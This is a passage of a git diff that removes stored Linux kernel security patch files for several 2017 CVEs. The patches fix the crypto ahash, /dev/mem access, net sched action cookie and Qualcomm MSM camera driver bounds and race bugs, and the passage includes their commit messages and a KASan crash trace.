- 	 *          is for internal use of the Crypto API and the
-@@ -283,38 +286,44 @@ static int ahash_save_req(struct ahash_request *req, crypto_completion_t cplt)
- 	return 0;
- }
- 
--static void ahash_restore_req(struct ahash_request *req)
-+static void ahash_restore_req(struct ahash_request *req, int err)
- {
- 	struct ahash_request_priv *priv = req->priv;
- 
-+	if (!err)
-+		memcpy(priv->result, req->result,
-+		       crypto_ahash_digestsize(crypto_ahash_reqtfm(req)));
-+
- 	/* Restore the original crypto request. */
- 	req->result = priv->result;
--	req->base.complete = priv->complete;
--	req->base.data = priv->data;
-+
-+	ahash_request_set_callback(req, priv->flags,
-+				   priv->complete, priv->data);
- 	req->priv = NULL;
- 
- 	/* Free the req->priv.priv from the ADJUSTED request. */
- 	kzfree(priv);
- }
- 
--static void ahash_op_unaligned_finish(struct ahash_request *req, int err)
-+static void ahash_notify_einprogress(struct ahash_request *req)
- {
- 	struct ahash_request_priv *priv = req->priv;
-+	struct crypto_async_request oreq;
- 
--	if (err == -EINPROGRESS)
--		return;
--
--	if (!err)
--		memcpy(priv->result, req->result,
--		       crypto_ahash_digestsize(crypto_ahash_reqtfm(req)));
-+	oreq.data = priv->data;
- 
--	ahash_restore_req(req);
-+	priv->complete(&oreq, -EINPROGRESS);
- }
- 
- static void ahash_op_unaligned_done(struct crypto_async_request *req, int err)
- {
- 	struct ahash_request *areq = req->data;
- 
-+	if (err == -EINPROGRESS) {
-+		ahash_notify_einprogress(areq);
-+		return;
-+	}
-+
- 	/*
- 	 * Restore the original request, see ahash_op_unaligned() for what
- 	 * goes where.
-@@ -325,7 +334,7 @@ static void ahash_op_unaligned_done(struct crypto_async_request *req, int err)
- 	 */
- 
- 	/* First copy req->result into req->priv.result */
--	ahash_op_unaligned_finish(areq, err);
-+	ahash_restore_req(areq, err);
- 
- 	/* Complete the ORIGINAL request. */
- 	areq->base.complete(&areq->base, err);
-@@ -341,7 +350,12 @@ static int ahash_op_unaligned(struct ahash_request *req,
- 		return err;
- 
- 	err = op(req);
--	ahash_op_unaligned_finish(req, err);
-+	if (err == -EINPROGRESS ||
-+	    (err == -EBUSY && (ahash_request_flags(req) &
-+			       CRYPTO_TFM_REQ_MAY_BACKLOG)))
-+		return err;
-+
-+	ahash_restore_req(req, err);
- 
- 	return err;
- }
-@@ -376,25 +390,14 @@ int crypto_ahash_digest(struct ahash_request *req)
- }
- EXPORT_SYMBOL_GPL(crypto_ahash_digest);
- 
--static void ahash_def_finup_finish2(struct ahash_request *req, int err)
-+static void ahash_def_finup_done2(struct crypto_async_request *req, int err)
- {
--	struct ahash_request_priv *priv = req->priv;
-+	struct ahash_request *areq = req->data;
- 
- 	if (err == -EINPROGRESS)
- 		return;
- 
--	if (!err)
--		memcpy(priv->result, req->result,
--		       crypto_ahash_digestsize(crypto_ahash_reqtfm(req)));
--
--	ahash_restore_req(req);
--}
--
--static void ahash_def_finup_done2(struct crypto_async_request *req, int err)
--{
--	struct ahash_request *areq = req->data;
--
--	ahash_def_finup_finish2(areq, err);
-+	ahash_restore_req(areq, err);
- 
- 	areq->base.complete(&areq->base, err);
- }
-@@ -405,11 +408,15 @@ static int ahash_def_finup_finish1(struct ahash_request *req, int err)
- 		goto out;
- 
- 	req->base.complete = ahash_def_finup_done2;
--	req->base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
-+
- 	err = crypto_ahash_reqtfm(req)->final(req);
-+	if (err == -EINPROGRESS ||
-+	    (err == -EBUSY && (ahash_request_flags(req) &
-+			       CRYPTO_TFM_REQ_MAY_BACKLOG)))
-+		return err;
- 
- out:
--	ahash_def_finup_finish2(req, err);
-+	ahash_restore_req(req, err);
- 	return err;
- }
- 
-@@ -417,7 +424,16 @@ static void ahash_def_finup_done1(struct crypto_async_request *req, int err)
- {
- 	struct ahash_request *areq = req->data;
- 
-+	if (err == -EINPROGRESS) {
-+		ahash_notify_einprogress(areq);
-+		return;
-+	}
-+
-+	areq->base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
-+
- 	err = ahash_def_finup_finish1(areq, err);
-+	if (areq->priv)
-+		return;
- 
- 	areq->base.complete(&areq->base, err);
- }
-@@ -432,6 +448,11 @@ static int ahash_def_finup(struct ahash_request *req)
- 		return err;
- 
- 	err = tfm->update(req);
-+	if (err == -EINPROGRESS ||
-+	    (err == -EBUSY && (ahash_request_flags(req) &
-+			       CRYPTO_TFM_REQ_MAY_BACKLOG)))
-+		return err;
-+
- 	return ahash_def_finup_finish1(req, err);
- }
- 
-diff --git a/include/crypto/internal/hash.h b/include/crypto/internal/hash.h
-index 3b4af1d..a25414c 100644
---- a/include/crypto/internal/hash.h
-+++ b/include/crypto/internal/hash.h
-@@ -173,6 +173,16 @@ static inline struct ahash_instance *ahash_alloc_instance(
- 	return crypto_alloc_instance2(name, alg, ahash_instance_headroom());
- }
- 
-+static inline void ahash_request_complete(struct ahash_request *req, int err)
-+{
-+	req->base.complete(&req->base, err);
-+}
-+
-+static inline u32 ahash_request_flags(struct ahash_request *req)
-+{
-+	return req->base.flags;
-+}
-+
- static inline struct crypto_ahash *crypto_spawn_ahash(
- 	struct crypto_ahash_spawn *spawn)
- {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7889/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-7889/^4.10/0001.patch
deleted file mode 100644
index d247d1fc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7889/^4.10/0001.patch
+++ /dev/null
@@ -1,210 +0,0 @@
-From a4866aa812518ed1a37d8ea0c881dc946409de94 Mon Sep 17 00:00:00 2001
-From: Kees Cook <keescook@chromium.org>
-Date: Wed, 5 Apr 2017 09:39:08 -0700
-Subject: mm: Tighten x86 /dev/mem with zeroing reads
-
-Under CONFIG_STRICT_DEVMEM, reading System RAM through /dev/mem is
-disallowed. However, on x86, the first 1MB was always allowed for BIOS
-and similar things, regardless of it actually being System RAM. It was
-possible for heap to end up getting allocated in low 1MB RAM, and then
-read by things like x86info or dd, which would trip hardened usercopy:
-
-usercopy: kernel memory exposure attempt detected from ffff880000090000 (dma-kmalloc-256) (4096 bytes)
-
-This changes the x86 exception for the low 1MB by reading back zeros for
-System RAM areas instead of blindly allowing them. More work is needed to
-extend this to mmap, but currently mmap doesn't go through usercopy, so
-hardened usercopy won't Oops the kernel.
-
-Reported-by: Tommi Rantala <tommi.t.rantala@nokia.com>
-Tested-by: Tommi Rantala <tommi.t.rantala@nokia.com>
-Signed-off-by: Kees Cook <keescook@chromium.org>
----
- arch/x86/mm/init.c | 41 +++++++++++++++++++--------
- drivers/char/mem.c | 82 ++++++++++++++++++++++++++++++++++--------------------
- 2 files changed, 82 insertions(+), 41 deletions(-)
-
-diff --git a/arch/x86/mm/init.c b/arch/x86/mm/init.c
-index 22af912..889e761 100644
---- a/arch/x86/mm/init.c
-+++ b/arch/x86/mm/init.c
-@@ -643,21 +643,40 @@ void __init init_mem_mapping(void)
-  * devmem_is_allowed() checks to see if /dev/mem access to a certain address
-  * is valid. The argument is a physical page number.
-  *
-- *
-- * On x86, access has to be given to the first megabyte of ram because that area
-- * contains BIOS code and data regions used by X and dosemu and similar apps.
-- * Access has to be given to non-kernel-ram areas as well, these contain the PCI
-- * mmio resources as well as potential bios/acpi data regions.
-+ * On x86, access has to be given to the first megabyte of RAM because that
-+ * area traditionally contains BIOS code and data regions used by X, dosemu,
-+ * and similar apps. Since they map the entire memory range, the whole range
-+ * must be allowed (for mapping), but any areas that would otherwise be
-+ * disallowed are flagged as being "zero filled" instead of rejected.
-+ * Access has to be given to non-kernel-ram areas as well, these contain the
-+ * PCI mmio resources as well as potential bios/acpi data regions.
-  */
- int devmem_is_allowed(unsigned long pagenr)
- {
--	if (pagenr < 256)
--		return 1;
--	if (iomem_is_exclusive(pagenr << PAGE_SHIFT))
-+	if (page_is_ram(pagenr)) {
-+		/*
-+		 * For disallowed memory regions in the low 1MB range,
-+		 * request that the page be shown as all zeros.
-+		 */
-+		if (pagenr < 256)
-+			return 2;
-+
-+		return 0;
-+	}
-+
-+	/*
-+	 * This must follow RAM test, since System RAM is considered a
-+	 * restricted resource under CONFIG_STRICT_IOMEM.
-+	 */
-+	if (iomem_is_exclusive(pagenr << PAGE_SHIFT)) {
-+		/* Low 1MB bypasses iomem restrictions. */
-+		if (pagenr < 256)
-+			return 1;
-+
- 		return 0;
--	if (!page_is_ram(pagenr))
--		return 1;
--	return 0;
-+	}
-+
-+	return 1;
- }
- 
- void free_init_pages(char *what, unsigned long begin, unsigned long end)
-diff --git a/drivers/char/mem.c b/drivers/char/mem.c
-index 6d9cc2d..7e4a9d1 100644
---- a/drivers/char/mem.c
-+++ b/drivers/char/mem.c
-@@ -60,6 +60,10 @@ static inline int valid_mmap_phys_addr_range(unsigned long pfn, size_t size)
- #endif
- 
- #ifdef CONFIG_STRICT_DEVMEM
-+static inline int page_is_allowed(unsigned long pfn)
-+{
-+	return devmem_is_allowed(pfn);
-+}
- static inline int range_is_allowed(unsigned long pfn, unsigned long size)
- {
- 	u64 from = ((u64)pfn) << PAGE_SHIFT;
-@@ -75,6 +79,10 @@ static inline int range_is_allowed(unsigned long pfn, unsigned long size)
- 	return 1;
- }
- #else
-+static inline int page_is_allowed(unsigned long pfn)
-+{
-+	return 1;
-+}
- static inline int range_is_allowed(unsigned long pfn, unsigned long size)
- {
- 	return 1;
-@@ -122,23 +130,31 @@ static ssize_t read_mem(struct file *file, char __user *buf,
- 
- 	while (count > 0) {
- 		unsigned long remaining;
-+		int allowed;
- 
- 		sz = size_inside_page(p, count);
- 
--		if (!range_is_allowed(p >> PAGE_SHIFT, count))
-+		allowed = page_is_allowed(p >> PAGE_SHIFT);
-+		if (!allowed)
- 			return -EPERM;
-+		if (allowed == 2) {
-+			/* Show zeros for restricted memory. */
-+			remaining = clear_user(buf, sz);
-+		} else {
-+			/*
-+			 * On ia64 if a page has been mapped somewhere as
-+			 * uncached, then it must also be accessed uncached
-+			 * by the kernel or data corruption may occur.
-+			 */
-+			ptr = xlate_dev_mem_ptr(p);
-+			if (!ptr)
-+				return -EFAULT;
- 
--		/*
--		 * On ia64 if a page has been mapped somewhere as uncached, then
--		 * it must also be accessed uncached by the kernel or data
--		 * corruption may occur.
--		 */
--		ptr = xlate_dev_mem_ptr(p);
--		if (!ptr)
--			return -EFAULT;
-+			remaining = copy_to_user(buf, ptr, sz);
-+
-+			unxlate_dev_mem_ptr(p, ptr);
-+		}
- 
--		remaining = copy_to_user(buf, ptr, sz);
--		unxlate_dev_mem_ptr(p, ptr);
- 		if (remaining)
- 			return -EFAULT;
- 
-@@ -181,30 +197,36 @@ static ssize_t write_mem(struct file *file, const char __user *buf,
- #endif
- 
- 	while (count > 0) {
-+		int allowed;
-+
- 		sz = size_inside_page(p, count);
- 
--		if (!range_is_allowed(p >> PAGE_SHIFT, sz))
-+		allowed = page_is_allowed(p >> PAGE_SHIFT);
-+		if (!allowed)
- 			return -EPERM;
- 
--		/*
--		 * On ia64 if a page has been mapped somewhere as uncached, then
--		 * it must also be accessed uncached by the kernel or data
--		 * corruption may occur.
--		 */
--		ptr = xlate_dev_mem_ptr(p);
--		if (!ptr) {
--			if (written)
--				break;
--			return -EFAULT;
--		}
-+		/* Skip actual writing when a page is marked as restricted. */
-+		if (allowed == 1) {
-+			/*
-+			 * On ia64 if a page has been mapped somewhere as
-+			 * uncached, then it must also be accessed uncached
-+			 * by the kernel or data corruption may occur.
-+			 */
-+			ptr = xlate_dev_mem_ptr(p);
-+			if (!ptr) {
-+				if (written)
-+					break;
-+				return -EFAULT;
-+			}
- 
--		copied = copy_from_user(ptr, buf, sz);
--		unxlate_dev_mem_ptr(p, ptr);
--		if (copied) {
--			written += sz - copied;
--			if (written)
--				break;
--			return -EFAULT;
-+			copied = copy_from_user(ptr, buf, sz);
-+			unxlate_dev_mem_ptr(p, ptr);
-+			if (copied) {
-+				written += sz - copied;
-+				if (written)
-+					break;
-+				return -EFAULT;
-+			}
- 		}
- 
- 		buf += sz;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7979/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-7979/^4.11/0001.patch
deleted file mode 100644
index ef032c7c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7979/^4.11/0001.patch
+++ /dev/null
@@ -1,130 +0,0 @@
-From e0535ce58b92d7baf0b33284a6c4f8f0338f943e Mon Sep 17 00:00:00 2001
-From: Wolfgang Bumiller <w.bumiller@proxmox.com>
-Date: Thu, 20 Apr 2017 14:08:26 +0200
-Subject: net sched actions: allocate act cookie early
-
-Policing filters do not use the TCA_ACT_* enum and the tb[]
-nlattr array in tcf_action_init_1() doesn't get filled for
-them so we should not try to look for a TCA_ACT_COOKIE
-attribute in the then uninitialized array.
-The error handling in cookie allocation then calls
-tcf_hash_release() leading to invalid memory access later
-on.
-Additionally, if cookie allocation fails after an already
-existing non-policing filter has successfully been changed,
-tcf_action_release() should not be called, also we would
-have to roll back the changes in the error handling, so
-instead we now allocate the cookie early and assign it on
-success at the end.
-
-CVE-2017-7979
-Fixes: 1045ba77a596 ("net sched actions: Add support for user cookies")
-Signed-off-by: Wolfgang Bumiller <w.bumiller@proxmox.com>
-Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/sched/act_api.c | 55 +++++++++++++++++++++++++++++++----------------------
- 1 file changed, 32 insertions(+), 23 deletions(-)
-
-diff --git a/net/sched/act_api.c b/net/sched/act_api.c
-index b70aa57..e05b924 100644
---- a/net/sched/act_api.c
-+++ b/net/sched/act_api.c
-@@ -529,20 +529,20 @@ errout:
- 	return err;
- }
- 
--static int nla_memdup_cookie(struct tc_action *a, struct nlattr **tb)
-+static struct tc_cookie *nla_memdup_cookie(struct nlattr **tb)
- {
--	a->act_cookie = kzalloc(sizeof(*a->act_cookie), GFP_KERNEL);
--	if (!a->act_cookie)
--		return -ENOMEM;
-+	struct tc_cookie *c = kzalloc(sizeof(*c), GFP_KERNEL);
-+	if (!c)
-+		return NULL;
- 
--	a->act_cookie->data = nla_memdup(tb[TCA_ACT_COOKIE], GFP_KERNEL);
--	if (!a->act_cookie->data) {
--		kfree(a->act_cookie);
--		return -ENOMEM;
-+	c->data = nla_memdup(tb[TCA_ACT_COOKIE], GFP_KERNEL);
-+	if (!c->data) {
-+		kfree(c);
-+		return NULL;
- 	}
--	a->act_cookie->len = nla_len(tb[TCA_ACT_COOKIE]);
-+	c->len = nla_len(tb[TCA_ACT_COOKIE]);
- 
--	return 0;
-+	return c;
- }
- 
- struct tc_action *tcf_action_init_1(struct net *net, struct nlattr *nla,
-@@ -551,6 +551,7 @@ struct tc_action *tcf_action_init_1(struct net *net, struct nlattr *nla,
- {
- 	struct tc_action *a;
- 	struct tc_action_ops *a_o;
-+	struct tc_cookie *cookie = NULL;
- 	char act_name[IFNAMSIZ];
- 	struct nlattr *tb[TCA_ACT_MAX + 1];
- 	struct nlattr *kind;
-@@ -566,6 +567,18 @@ struct tc_action *tcf_action_init_1(struct net *net, struct nlattr *nla,
- 			goto err_out;
- 		if (nla_strlcpy(act_name, kind, IFNAMSIZ) >= IFNAMSIZ)
- 			goto err_out;
-+		if (tb[TCA_ACT_COOKIE]) {
-+			int cklen = nla_len(tb[TCA_ACT_COOKIE]);
-+
-+			if (cklen > TC_COOKIE_MAX_SIZE)
-+				goto err_out;
-+
-+			cookie = nla_memdup_cookie(tb);
-+			if (!cookie) {
-+				err = -ENOMEM;
-+				goto err_out;
-+			}
-+		}
- 	} else {
- 		err = -EINVAL;
- 		if (strlcpy(act_name, name, IFNAMSIZ) >= IFNAMSIZ)
-@@ -604,20 +617,12 @@ struct tc_action *tcf_action_init_1(struct net *net, struct nlattr *nla,
- 	if (err < 0)
- 		goto err_mod;
- 
--	if (tb[TCA_ACT_COOKIE]) {
--		int cklen = nla_len(tb[TCA_ACT_COOKIE]);
--
--		if (cklen > TC_COOKIE_MAX_SIZE) {
--			err = -EINVAL;
--			tcf_hash_release(a, bind);
--			goto err_mod;
--		}
--
--		if (nla_memdup_cookie(a, tb) < 0) {
--			err = -ENOMEM;
--			tcf_hash_release(a, bind);
--			goto err_mod;
-+	if (name == NULL && tb[TCA_ACT_COOKIE]) {
-+		if (a->act_cookie) {
-+			kfree(a->act_cookie->data);
-+			kfree(a->act_cookie);
- 		}
-+		a->act_cookie = cookie;
- 	}
- 
- 	/* module count goes up only when brand new policy is created
-@@ -632,6 +637,10 @@ struct tc_action *tcf_action_init_1(struct net *net, struct nlattr *nla,
- err_mod:
- 	module_put(a_o->owner);
- err_out:
-+	if (cookie) {
-+		kfree(cookie->data);
-+		kfree(cookie);
-+	}
- 	return ERR_PTR(err);
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8233/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-8233/3.18/0001.patch
deleted file mode 100644
index 2646b4fa..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8233/3.18/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 64b7bc25e019dd07e8042e0a6ec6dc6a1dd0c385 Mon Sep 17 00:00:00 2001
-From: Pratap Nirujogi <pratapn@codeaurora.org>
-Date: Mon, 20 Feb 2017 17:29:33 +0530
-Subject: msm: camera: cpp: Fixing Heap overflow in output buffer
-
-Issue:
-Missing bound check when writing into the output array
-buffer, which can lead to out-of-bound heap write.
-
-Fix:
-Addding hardcoded constant 8 in the MSM_OUTPUT_BUF_CNT
-macro and size check to the place where the array is
-accessed. Returning '0' if exceeds MSM_OUTPUT_BUF_CNT.
-Caller will return -EINVAL for '0'.
-
-Change-Id: Ic03f86e3e47ece9ca7069527e741a75ad9a0f83f
-CRs-Fixed: 2004036
-Signed-off-by: Pratap Nirujogi <pratapn@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 2 ++
- include/uapi/media/msmb_pproc.h                          | 3 ++-
- 2 files changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index e35a744..19d9bbb 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2045,6 +2045,8 @@ static int msm_cpp_check_buf_type(struct msm_buf_mngr_info *buff_mgr_info,
- 			/* More or equal bufs as Input buffer */
- 			num_output_bufs = new_frame->batch_info.batch_size;
- 		}
-+		if (num_output_bufs > MSM_OUTPUT_BUF_CNT)
-+			return 0;
- 		for (i = 0; i < num_output_bufs; i++) {
- 			new_frame->output_buffer_info[i].index =
- 				buff_mgr_info->user_buf.buf_idx[i];
-diff --git a/include/uapi/media/msmb_pproc.h b/include/uapi/media/msmb_pproc.h
-index b65669b..8f45457 100644
---- a/include/uapi/media/msmb_pproc.h
-+++ b/include/uapi/media/msmb_pproc.h
-@@ -16,6 +16,7 @@
- #define MSM_CPP_MAX_FRAME_LENGTH 4096
- #define MSM_CPP_MAX_FW_NAME_LEN 32
- #define MAX_FREQ_TBL 10
-+#define MSM_OUTPUT_BUF_CNT 8
- 
- enum msm_cpp_frame_type {
- 	MSM_CPP_OFFLINE_FRAME,
-@@ -76,7 +77,7 @@ struct msm_cpp_frame_info_t {
- 	uint32_t feature_mask;
- 	uint8_t we_disable;
- 	struct msm_cpp_buffer_info_t input_buffer_info;
--	struct msm_cpp_buffer_info_t output_buffer_info[8];
-+	struct msm_cpp_buffer_info_t output_buffer_info[MSM_OUTPUT_BUF_CNT];
- 	struct msm_cpp_buffer_info_t duplicate_buffer_info;
- 	struct msm_cpp_buffer_info_t tnr_scratch_buffer_info[2];
- 	uint32_t reserved;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8233/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8233/4.4/0002.patch
deleted file mode 100644
index ab69c5dc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8233/4.4/0002.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 8b0cb658b568e4b160a5b57fb3cef0063aff56d9 Mon Sep 17 00:00:00 2001
-From: Pratap Nirujogi <pratapn@codeaurora.org>
-Date: Mon, 20 Feb 2017 17:29:33 +0530
-Subject: msm: camera: cpp: Fixing Heap overflow in output buffer
-
-Issue:
-Missing bound check when writing into the output array
-buffer, which can lead to out-of-bound heap write.
-
-Fix:
-Addding hardcoded constant 8 in the MSM_OUTPUT_BUF_CNT
-macro and size check to the place where the array is
-accessed. Returning '0' if exceeds MSM_OUTPUT_BUF_CNT.
-Caller will return -EINVAL for '0'.
-
-Change-Id: Ic03f86e3e47ece9ca7069527e741a75ad9a0f83f
-CRs-Fixed: 2004036
-Signed-off-by: Pratap Nirujogi <pratapn@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 2 ++
- include/uapi/media/msmb_pproc.h                          | 3 ++-
- 2 files changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 064c1e8..08aab07 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -2116,6 +2116,8 @@ static int msm_cpp_check_buf_type(struct msm_buf_mngr_info *buff_mgr_info,
- 			/* More or equal bufs as Input buffer */
- 			num_output_bufs = new_frame->batch_info.batch_size;
- 		}
-+		if (num_output_bufs > MSM_OUTPUT_BUF_CNT)
-+			return 0;
- 		for (i = 0; i < num_output_bufs; i++) {
- 			new_frame->output_buffer_info[i].index =
- 				buff_mgr_info->user_buf.buf_idx[i];
-diff --git a/include/uapi/media/msmb_pproc.h b/include/uapi/media/msmb_pproc.h
-index b65669b..8f45457 100644
---- a/include/uapi/media/msmb_pproc.h
-+++ b/include/uapi/media/msmb_pproc.h
-@@ -16,6 +16,7 @@
- #define MSM_CPP_MAX_FRAME_LENGTH 4096
- #define MSM_CPP_MAX_FW_NAME_LEN 32
- #define MAX_FREQ_TBL 10
-+#define MSM_OUTPUT_BUF_CNT 8
- 
- enum msm_cpp_frame_type {
- 	MSM_CPP_OFFLINE_FRAME,
-@@ -76,7 +77,7 @@ struct msm_cpp_frame_info_t {
- 	uint32_t feature_mask;
- 	uint8_t we_disable;
- 	struct msm_cpp_buffer_info_t input_buffer_info;
--	struct msm_cpp_buffer_info_t output_buffer_info[8];
-+	struct msm_cpp_buffer_info_t output_buffer_info[MSM_OUTPUT_BUF_CNT];
- 	struct msm_cpp_buffer_info_t duplicate_buffer_info;
- 	struct msm_cpp_buffer_info_t tnr_scratch_buffer_info[2];
- 	uint32_t reserved;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8234/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8234/ANY/0001.patch
deleted file mode 100644
index d6452b3a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8234/ANY/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From 6266f954a52641f550ef71653ea83c80bdd083be Mon Sep 17 00:00:00 2001
-From: Ravi Kishore Tanuku <rktanuku@codeaurora.org>
-Date: Fri, 29 May 2015 11:49:26 +0530
-Subject: msm: camera: cci: Add out of boundary check
-
-While optimizing the cci transactions, we compare
-i2c addresses in consecutive commands using pointer
-to command.
-   if (cmd->reg_addr + 1 ==(cmd+1)->reg_addr)
-Here, we need to have a out of boundary
-check to see if the pointer to that command does not
-go out of bounds.
-
-==================================================================
-BUG: KASan: out of bounds access in msm_cci_i2c_write+0x644/0xe64 at addr ffffffc01ef225d0
-Read of size 2 by task mm-qcamera-daem/6458
-=============================================================================
-BUG kmalloc-2048 (Not tainted): kasan: bad access detected
------------------------------------------------------------------------------
-
-Disabling lock debugging due to kernel taint
-INFO: Slab 0xffffffbc027bc800 objects=16 used=16 fp=0x          (null) flags=0x4080
-INFO: Object 0xffffffc01ef22000 @offset=8192 fp=0x0000000000000101
-Call trace:
-[<ffffffc000089dd0>] dump_backtrace+0x0/0x174
-[<ffffffc000089f54>] show_stack+0x10/0x1c
-[<ffffffc000f7bc34>] dump_stack+0x1c/0x28
-[<ffffffc0001bcbf4>] print_trailer+0x138/0x14c
-[<ffffffc0001bd02c>] object_err+0x38/0x4c
-[<ffffffc0001c1cb4>] kasan_report_error+0x21c/0x3f0
-[<ffffffc0001c1f88>] kasan_report+0x68/0x78
-[<ffffffc0001c11d0>] __asan_load2+0x78/0x84
-[<ffffffc0008f6c7c>] msm_cci_i2c_write+0x640/0xe64
-[<ffffffc0008f83ac>] msm_cci_config+0xde0/0x18fc
-[<ffffffc0008f8f50>] msm_cci_subdev_ioctl+0x88/0xdc
-[<ffffffc0008fb2a4>] msm_camera_cci_i2c_write_table+0x100/0x198
-[<ffffffc00091d5d0>] msm_sensor_config32+0x684/0xe64
-[<ffffffc00091bc94>] msm_sensor_subdev_ioctl+0xf8/0x28c
-[<ffffffc00091be64>] msm_sensor_subdev_do_ioctl+0x3c/0x48
-[<ffffffc000882cf0>] video_usercopy+0x2e8/0x4d4
-[<ffffffc00091a8f0>] msm_sensor_subdev_fops_ioctl+0x10/0x1c
-[<ffffffc0008908d4>] v4l2_compat_ioctl32+0x668/0x684
-[<ffffffc00022611c>] compat_sys_ioctl+0x13c/0x1998
-Memory state around the buggy address:
- ffffffc01ef22480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- ffffffc01ef22500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
->ffffffc01ef22580: 00 00 00 00 00 00 00 00 00 00 fc fc fc fc fc fc
-                                                 ^
- ffffffc01ef22600: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
- ffffffc01ef22680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-==================================================================
-
-Change-Id: Id835bf3276c91cd80c3ef59e6648a6d6792d2567
-Signed-off-by: Ravi Kishore Tanuku <rktanuku@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index 86561ce..05a4c0b 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -330,7 +330,7 @@ static int32_t msm_cci_calc_cmd_len(struct cci_device *cci_dev,
- 		pack_max_len = size < (cci_dev->payload_size-len) ?
- 			size : (cci_dev->payload_size-len);
- 		for (i = 0; i < pack_max_len;) {
--			if (cmd->delay)
-+			if (cmd->delay || ((cmd - i2c_cmd) >= (cmd_size-1)))
- 				break;
- 			if (cmd->reg_addr + 1 ==
- 				(cmd+1)->reg_addr) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8235/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8235/ANY/0001.patch
deleted file mode 100644
index 0516ba37..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8235/ANY/0001.patch
+++ /dev/null
@@ -1,118 +0,0 @@
-From 7e4424a1b5f6a6536066cca7aac2c3a23fd39f6f Mon Sep 17 00:00:00 2001
-From: Krishnankutty Kolathappilly <kkolatha@codeaurora.org>
-Date: Wed, 16 Nov 2016 15:10:18 -0800
-Subject: msm: camera: Synchronize jpeg ISR and userspace call
-
-This will fix the race between jpeg dma ISR and userspace call.
-Without this fix jpeg dma may randomly crash due to invalid pointer
-access.
-
-Change-Id: I559ae08b9a46d5d3c35f8be509976a25faa967f9
-CRs-Fixed: 1083323
-Signed-off-by: Krishnankutty Kolathappilly <kkolatha@codeaurora.org>
----
- .../platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.c     | 14 +++++++++++---
- .../platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.h     |  1 +
- 2 files changed, 12 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.c b/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.c
-index 3301fc4..4b48469 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.c
-@@ -537,6 +537,7 @@ static int msm_jpegdma_open(struct file *file)
- 	if (!ctx)
- 		return -ENOMEM;
- 
-+	mutex_init(&ctx->lock);
- 	ctx->jdma_device = device;
- 	dev_dbg(ctx->jdma_device->dev, "Jpeg v4l2 dma open\n");
- 	/* Set ctx defaults */
-@@ -835,12 +836,13 @@ static int msm_jpegdma_qbuf(struct file *file, void *fh,
- 	int ret;
- 
- 	msm_jpegdma_cast_long_to_buff_ptr(buf->m.userptr, &up_buff);
--
-+	mutex_lock(&ctx->lock);
- 	if (!access_ok(VERIFY_READ, up_buff,
- 		sizeof(struct msm_jpeg_dma_buff)) ||
- 		get_user(kp_buff.fd, &up_buff->fd) ||
- 		get_user(kp_buff.offset, &up_buff->offset)) {
- 		dev_err(ctx->jdma_device->dev, "Error getting user data\n");
-+		mutex_unlock(&ctx->lock);
- 		return -EFAULT;
- 	}
- 
